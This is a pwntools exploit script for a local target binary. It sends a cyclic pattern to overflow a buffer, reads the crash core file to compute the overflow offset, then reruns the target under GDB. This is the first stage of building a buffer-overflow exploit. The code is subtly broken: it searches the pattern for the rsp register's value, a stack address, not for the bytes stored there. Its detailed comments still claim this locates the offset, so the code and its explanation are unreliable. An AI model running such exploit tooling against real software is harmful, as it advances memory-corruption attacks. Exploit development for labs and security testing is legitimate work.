exploit.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template
from pwn import *
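# Set up pwntools for the correct architecture.
# The generated template leaves the placeholder 'i386|amd64' here, which
# context.update() rejects (arch must be a single known value), so the script
# never gets past this line.  The crash analysis below reads core.rsp, an
# amd64 register, so the target is treated as 64-bit; for a 32-bit binary use
# arch='i386' and read core.eip / core.esp instead.
context.update(arch='amd64')
# Path to the target binary, relative to the working directory.
exe = './binary'
# ROP helper bound to the binary; not referenced anywhere else in this script.
rop = ROP(exe)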
# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
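def start(argv=None, *a, **kw):
    '''Start the exploit against the target.

    Args:
        argv: extra command-line arguments appended after the binary path.
            Defaults to no arguments; ``None`` replaces the mutable
            ``argv=[]`` default so no list is shared between calls.
        *a, **kw: forwarded unchanged to gdb.debug() or process().

    Returns:
        The tube from gdb.debug() when the GDB flag was given on the command
        line (pwntools' ``args.GDB``), otherwise a plain process() tube.
    '''
    argv = [] if argv is None else list(argv)
    if args.GDB:
        # gdbscript is the module-level GDB command string defined below;
        # it is looked up at call time, so the later definition is fine.
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    return process([exe] + argv, *a, **kw)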
# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
# Commands fed to GDB when the script is run with the GDB flag (see start()).
# The .format(**locals()) hook lets module-level names be interpolated with
# {name} placeholders; the script currently has none, so the text is used
# as-is: a leading newline, "continue", a trailing newline.
gdbscript = '\ncontinue\n'.format(**locals())
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
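io = start()
# Wait for the prompt, then send a cyclic (de Bruijn) pattern long enough to
# overrun the buffer and crash the process.  Change the recvuntil() string to
# the target's actual prompt.  A bytes literal avoids the str/bytes warning
# from pwntools on Python 3 and is accepted on Python 2 as well.
io.recvuntil(b'>\n')
io.sendline(cyclic(1000))
io.wait()
# Read the register state at the time of the crash from the core file.
core = io.corefile
base = core.rsp  # amd64 register; use core.eip / core.esp for an i386 target
# Locate that value inside the pattern.  The original script used
# pattern_offset without ever assigning it (NameError); cyclic_find() is the
# lookup that matches cyclic() above and returns -1 when the value is not
# part of the pattern (register does not hold pattern bytes, or the pattern
# was too short).  Offset 0 is a valid hit, so only negative results are
# reported as "not found".
pattern_offset = cyclic_find(base)
if pattern_offset < 0:
    # print(...) with a single argument is valid on both Python 2 and 3.
    print("Couldn't find the offset")
else:
    print("Pattern offset in hex: %s" % hex(pattern_offset))
# Run a second time under GDB (same effect as passing GDB on the command line).
args.GDB = True
io = start()
# Hand the session to the user.
io.interactive()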